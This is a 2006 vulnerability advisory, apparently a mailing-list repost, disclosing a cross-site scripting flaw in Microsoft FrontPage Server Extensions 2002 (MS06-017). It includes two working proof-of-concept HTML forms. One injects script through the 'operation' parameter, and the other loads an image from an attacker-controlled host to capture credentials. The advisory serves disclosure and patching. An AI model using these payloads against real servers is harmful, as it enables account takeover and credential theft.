Argeniss Security Advisory
Name: Vulnerability in Microsoft FrontPage Server
Extensions Could Allow
Cross-Site Scripting (MS06-17)
Affected Software: Microsoft FrontPage Server Extensions
2002 and Microsoft
SharePoint Team Services
Severity: Medium
Remote exploitable: Yes (User intervention required)
Credits: Esteban Martínez Fayó
Date: 4/11/2006
Advisory Number: ARG040602
Details:
The FrontPage Server Extensions 2002 (included in Windows
Sever 2003 IIS 6.0
and available as a separate download for Windows 2000 and
XP) has a web page
/_vti_bin/_vti_adm/fpadmdll.dll that is used for
administrative purposes.
This web page is vulnerable to cross site scripting attacks
allowing an
attacker to run client-side script on behalf of an FPSE
user. If the victim
is an administrator, the attacker could take complete
control of a Front
Page Server Extensions 2002 server.
To exploit the vulnerability an attacker can send a
specially crafted e-mail
message to a FPSE user and then persuade the user to click a
link in the
e-mail message.
In addition, this vulnerability can be exploited if an
attacker hosts a
malicious website and persuade the user to visit it.
The vulnerable parameters of fpadmdll.dll are
"operation", "command", and
"name". These parameters appears in the output
without properly sanitization
in an HTML comment but it can be escaped with a '-->'.
Exploit Examples:
An attacker could create a FORM that POST to the FPSE server
and executes a
script on the client system.
<form action=http:
//iisserver/_vti_bin/_vti_adm/fpadmdll.dll
method="POST">
<input type="hidden"
name="operation"
value="--><script>alert()</script>&quo
t;>
<input type="hidden"
name="action" value="none">
<input type="hidden" name="port"
value="/LM/W3SVC/1:">
<input type="submit" name="page"
value="healthrp.htm">
</form>
Also, an attacker could inject an image from another web
site that he has
control over and if it has HTTP authentication could
convince the user to
enter its credentials and capture it.
<form action=http:
//iisserver/_vti_bin/_vti_adm/fpadmdll.dll
method="POST">
<input type="hidden"
name="operation" value="--><img
src=http://hackersite/ima
ge.jpg>">
<input type="hidden"
name="action" value="none">
<input type="hidden" name="port"
value="/LM/W3SVC/1:">
<input type="submit" name="page"
value="healthrp.htm">
</form>
Vendor Status:
Vendor was contacted and a patch was released.
Patch Available:
Apply patch MS06-017.
Links:
http://www.argeniss.com/research/ARGENISS-ADV-040602.txt
http://www.microsoft.com/technet/security/Bullet
in/MS06-017.mspx
Spam:
Argeniss Ultimate 0day Exploits Pack
http://www.arge
niss.com/products.html
Argeniss - Information Security
*Application Security Experts*
http://www.argeniss.com
__________________________________________________
Correo Yahoo!
Espacio para todos tus mensajes, antivirus y antispam
¡gratis!
¡Abrí tu cuenta ya! - http://correo.yahoo.com.ar
--
NTBugtraq Editor's Note:
Most viruses these days use spoofed email addresses. As
such, using an Anti-Virus product which automatically
notifies the perceived sender of a message it believes is
infected may well cause more harm than good. Someone who did
not actually send you a virus may receive the notification
and scramble their support staff to find an infection which
never existed in the first place. Suggest such notifications
be disabled by whomever is responsible for your AV, or at
least that the idea is considered.
--
|
